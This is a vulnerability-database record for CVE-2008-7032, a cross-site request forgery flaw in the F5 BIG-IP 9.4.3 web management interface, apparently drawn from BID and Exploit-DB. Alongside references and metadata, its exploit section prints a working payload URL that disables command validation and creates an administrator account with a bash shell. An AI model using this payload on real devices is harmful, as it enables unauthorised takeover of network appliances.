Details of VAR-E-200802-0133

ID

VAR-E-200802-0133

CVE

cve_id:

CVE-2008-7032

Trust: 1.9

sources: BID: 27720 // EXPLOIT-DB: 31133 // EDBNET: 52739

EDB ID

31133

TITLE

F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 31133

DESCRIPTION

F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery. CVE-2008-7032CVE-50985 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 31133

AFFECTED PRODUCTS

vendor:	f5	model:	big-ip	scope:	eq	version:	9.4.3	Trust: 1.0
vendor:	f5	model:	bigip	scope:	eq	version:	9.4.3	Trust: 0.3

sources: BID: 27720 // EXPLOIT-DB: 31133

EXPLOIT

source: https://www.securityfocus.com/bid/27720/info

F5 BIG-IP is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to execute arbitrary actions on an affected device.

F5 BIG-IP 9.4.3 is vulnerable; other versions may also be affected.

https://www.example.com/tmui/Control/form?handler=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe&handler_before=&form_page=%2Ftmui%2Fsystem%2Fbigpipe%2Fbigpipe.jsp%3F&form_page_before=&bigpipe_output=&bigpipe_cmd_validation=NO_VALIDATION&bigpipe_cmd_before=&bigpipe_cmd=user+testuser+password+none+testpwd+shell+%2Fbin%2Fbash+role+administrator+in+all

Trust: 1.0

sources: EXPLOIT-DB: 31133

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 31133

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 31133

TYPE

Web Management Interface Cross-Site Request Forgery

Trust: 1.0

sources: EXPLOIT-DB: 31133

CREDITS

nnposter

Trust: 0.6

sources: EXPLOIT-DB: 31133

EXTERNAL IDS

db:	NVD	id:	CVE-2008-7032	Trust: 1.9
db:	BID	id:	27720	Trust: 1.9
db:	EXPLOIT-DB	id:	31133	Trust: 1.6
db:	EDBNET	id:	52739	Trust: 0.6

sources: BID: 27720 // EXPLOIT-DB: 31133 // EDBNET: 52739

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2008-7032	Trust: 1.6
url:	https://www.securityfocus.com/bid/27720/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/31133/	Trust: 0.6
url:	http://www.f5.com/f5products/bigip/	Trust: 0.3

sources: BID: 27720 // EXPLOIT-DB: 31133 // EDBNET: 52739

SOURCES

db:	BID	id:	27720
db:	EXPLOIT-DB	id:	31133
db:	EDBNET	id:	52739

LAST UPDATE DATE

2022-07-27T09:41:27.483000+00:00

SOURCES UPDATE DATE

db:

BID

id:

27720

date:

2015-04-16T18:06:00

SOURCES RELEASE DATE

db:	BID	id:	27720	date:	2008-02-11T00:00:00
db:	EXPLOIT-DB	id:	31133	date:	2008-02-11T00:00:00
db:	EDBNET	id:	52739	date:	2008-02-11T00:00:00